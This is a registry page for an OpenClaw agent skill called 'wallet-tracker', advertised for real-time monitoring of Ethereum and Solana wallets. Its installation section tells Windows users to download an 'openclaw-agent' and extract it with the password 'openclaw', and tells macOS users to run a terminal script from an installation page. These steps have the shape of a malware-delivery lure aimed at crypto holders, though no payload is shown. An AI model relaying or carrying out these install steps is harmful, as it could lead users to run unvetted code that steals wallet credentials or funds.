ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Monitor whale movements, token transfers, and portfolio changes across Ethereum and Solana in real-time with the OpenClaw wallet-tracker skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-bf3bs
Or

What This Skill Does

The wallet-tracker skill is a robust blockchain monitoring tool designed for OpenClaw AI agents. It enables users to observe on-chain activity in real-time, providing deep insights into Ethereum, Solana, and other supported chains. By integrating with the openclaw-agent utility, this skill allows for granular monitoring of large transactions (whale movements), ERC-20 token transfers, NFT flow, and specific DeFi interactions. It transforms raw blockchain data into readable logs, allowing your agent to report on portfolio changes or alert you to significant liquidity shifts as they happen on the ledger.

Installation

To get started, you must first install the required agent utility. On Windows, download the openclaw-agent and extract it using the password 'openclaw'. For macOS users, visit the installation page and execute the provided terminal script. Once the base agent is active, install the specific skill within OpenClaw by running: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-bf3bs.

Use Cases

This skill is perfect for traders, data analysts, and developers. Use it to build an automated 'whale-watching' bot that logs movements of high-value wallets. It is also ideal for monitoring your own portfolio performance across different wallets to identify token transfers instantly. Developers can utilize the included Python templates to trigger webhooks or notifications whenever a specific block threshold is crossed, ensuring they never miss critical market events.

Example Prompts

  1. "OpenClaw, start tracking this Ethereum address 0x123... and alert me whenever a transaction exceeds 50 ETH."
  2. "Can you give me a summary of the last 10 ERC-20 token transfers for my Solana wallet address?"
  3. "Set up a continuous monitor for this whale wallet and print a report every time they interact with a Uniswap pool."

Tips & Limitations

Always ensure your API keys (such as Etherscan) are kept secure. The tracker relies on periodic polling; for ultra-low latency requirements, consider adjusting the interval settings in the Python script. Be aware that tracking a massive number of addresses simultaneously may increase API rate limiting, so configure your update intervals thoughtfully to balance performance and data freshness.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-bf3bs": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#crypto#defi#web3#finance
Safety Score: 3/5

Flags: network-access, external-api, code-execution